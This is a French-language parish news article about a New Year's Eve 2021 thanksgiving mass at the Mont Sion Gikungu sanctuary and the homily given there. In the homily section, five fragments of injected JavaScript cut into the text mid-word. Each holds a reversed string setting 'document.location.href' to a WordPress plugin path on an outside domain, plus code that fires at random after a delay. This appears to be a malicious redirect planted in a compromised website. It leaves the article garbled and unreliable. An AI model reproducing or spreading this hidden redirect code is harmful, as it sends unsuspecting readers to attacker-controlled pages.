Il est beau de commencer toute activité et de la clôturer devant le Seigneur pour être sûr de sa protection et de son assistance. Ainsi en est-il pour le début et la fin d’une année. Dans cette perspective d’idées, le sanctuaire de la Reine de la Paix et la Réconciliation de Mont Sion Gikungu a prévu une belle occasion pour les fidèles de dire ‘Merci, Seigneur pour toutes les grâces reçues au cours de l’année 2021 que nous clôturons aujourd’hui’. Une messe d’action de grâces a débuté à dix-huit heures pour durer deux heures de temps. Elle a été présidée par le Père Longin NTIRANYIBAGIRA avec à ses côtés six autres prêtres et un Frater diocésain en vacances. La chorale Sainte Thérèse de l’Enfant Jésus et de la Sainte Face avait tout prévu pour bien animer ladite célébration eucharistique en chants et psaumes. Les lectures du ont été tirées du Livre de la Genèse et l’Évangile selon saint Luc.
Dans sa prédication homilétique, le Père Longin est parti du message tiré de la première lecture pour signifier que, dans son immense bonté, Dieu avait tout prévu pour assurer une vie paisible et équilibrée de l’homme bien avant de l’installer sur la face de la terre. Avec cela seulement, l’homme n’a rien d’autre chose à dire que rendre grâce à Dieu sans cesse pour son attention pour lui. ‘Un jour comme celui-ci est une belle occasion qui nous est offerte une fois pendant toute une année pour renouveler notre amour confiant en notre Dieu et Père’, a martelé le Père prédicateur. Dans la vie des hommes, il y a deux signes qui manifestent qu’une personne a des relations fortes avec une autre. Il y a d’abord le fait de se ressembler physiquement en beaucoup de traits, ensuite vient le fait que la personne la plus jeune s’efforce à imiter les actions de la personne âgée qui lui ressemble. Pour ce qui nous concerne en tant que fils et filles du même Père, nous sommes appelés à faire de tout notre mieux pour faire les mêmes actes d’amour et de bienveillance envers notre prochain comme notre Père le fait et nous invite sans cesse à l’imiter. Avec cela, nous serons dignes de mériter la joie qu’il nous a promis dans son royaume des cieux où il n’y a ni moisissure ni rouille.
A ceux qui se demandent comment est ce Dieu qui nous invite à l’imiter, une réponse facile leur a été toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnée : c’est un Dieu au plan d’amour et de développement pour toutes ses créatures, il fait directement tout ce qu’il dit, et tout s’exécute dans l’ordre du premier au sixième jour, et il trouve que tout est bon. Au septième jour, il trouve que tout est très bon cette fois-ci et se repose après avoir tout prévu et ortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné pour le bien de la personne humaine. Si nous nous fatiguons sans rien faire qui montre que nous tentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons à imiter Dieu, nous n’aurons pas de joie et ce sera une peine perdue. Une occasion de nous évaluer vient en ce jour où nous faisons un regard rétrospectif sur ce que nous avons accompli au cours de cette année 2021 : qu’est-ce que nous avons fait de bon, qu’est-ce que nous avons fait de très bon ? Un bon chrétien ne toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit pas s’évertuer à accomplir toujours les grandes choses tout en ignorant les petites choses qui montrent que nous sommes ortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnés chez nous à la maison, telles que balayer la maison et ses alentours, nettoyer la cuisine, arranger la chambre et bien faire son lit, et bien d’autres choses encore. Notre bel exemple est la Vierge Marie qui ne s’est pas assise après qu’elle ait reçu le message de l’ange lui disant qu’elle allait être la Mère du Seigneur. Elle s’est plutôt mise en route pour saluer, visiter et aider sa sœur Elizabeth dans de petits travaux ménagers de la maison, et cela pendant trois mois comme nous le disent les Saintes Ecritures.
NYANDWI M.